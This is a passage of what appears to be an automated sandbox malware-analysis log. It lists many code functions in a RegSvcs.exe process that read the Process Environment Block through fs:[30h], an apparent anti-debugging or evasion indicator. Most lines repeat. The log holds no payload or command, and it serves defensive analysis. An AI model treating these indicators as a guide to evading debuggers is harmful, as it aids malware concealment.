          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF4000 mov ecx, dword ptr fs:[00000030h]8_2_00FF4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA01F8 mov eax, dword ptr fs:[00000030h]8_2_00FA01F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h]8_2_00F861D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h]8_2_00F861D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006030 mov eax, dword ptr fs:[00000030h]8_2_01006030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0185 mov eax, dword ptr fs:[00000030h]8_2_00FB0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C156 mov eax, dword ptr fs:[00000030h]8_2_00F6C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h]8_2_00F76154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h]8_2_00F76154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010080A8 mov eax, dword ptr fs:[00000030h]8_2_010080A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72140 mov ecx, dword ptr fs:[00000030h]8_2_00F72140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72140 mov eax, dword ptr fs:[00000030h]8_2_00F72140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010360B8 mov eax, dword ptr fs:[00000030h]8_2_010360B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010360B8 mov ecx, dword ptr fs:[00000030h]8_2_010360B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0124 mov eax, dword ptr fs:[00000030h]8_2_00FA0124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov ecx, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104634F mov eax, dword ptr fs:[00000030h]8_2_0104634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A352 mov eax, dword ptr fs:[00000030h]8_2_0103A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018350 mov ecx, dword ptr fs:[00000030h]8_2_01018350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h]8_2_00F802A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h]8_2_00F802A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101437C mov eax, dword ptr fs:[00000030h]8_2_0101437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h]8_2_00FAE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h]8_2_00FAE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6826B mov eax, dword ptr fs:[00000030h]8_2_00F6826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A250 mov eax, dword ptr fs:[00000030h]8_2_00F6A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76259 mov eax, dword ptr fs:[00000030h]8_2_00F76259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF8243 mov eax, dword ptr fs:[00000030h]8_2_00FF8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF8243 mov ecx, dword ptr fs:[00000030h]8_2_00FF8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6823B mov eax, dword ptr fs:[00000030h]8_2_00F6823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C3CD mov eax, dword ptr fs:[00000030h]8_2_0102C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h]8_2_010143D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h]8_2_010143D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov ecx, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80218 mov eax, dword ptr fs:[00000030h]8_2_00F80218
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA63FF mov eax, dword ptr fs:[00000030h]8_2_00FA63FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF63C0 mov eax, dword ptr fs:[00000030h]8_2_00FF63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h]8_2_0102A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h]8_2_0102A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104625D mov eax, dword ptr fs:[00000030h]8_2_0104625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h]8_2_00F9438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h]8_2_00F9438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov ecx, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov ecx, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010462D6 mov eax, dword ptr fs:[00000030h]8_2_010462D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72324 mov eax, dword ptr fs:[00000030h]8_2_00F72324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C310 mov ecx, dword ptr fs:[00000030h]8_2_00F6C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90310 mov ecx, dword ptr fs:[00000030h]8_2_00F90310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]8_2_00FAA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]8_2_00FAA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]8_2_00FAA30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006500 mov eax, dword ptr fs:[00000030h]8_2_01006500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]8_2_01044500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F704E5 mov ecx, dword ptr fs:[00000030h]8_2_00F704E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA44B0 mov ecx, dword ptr fs:[00000030h]8_2_00FA44B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFA4B0 mov eax, dword ptr fs:[00000030h]8_2_00FFA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F764AB mov eax, dword ptr fs:[00000030h]8_2_00F764AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76484 mov eax, dword ptr fs:[00000030h]8_2_00F76484
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]8_2_00F9A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]8_2_00F9A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]8_2_00F9A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC460 mov ecx, dword ptr fs:[00000030h]8_2_00FFC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9245A mov eax, dword ptr fs:[00000030h]8_2_00F9245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6645D mov eax, dword ptr fs:[00000030h]8_2_00F6645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
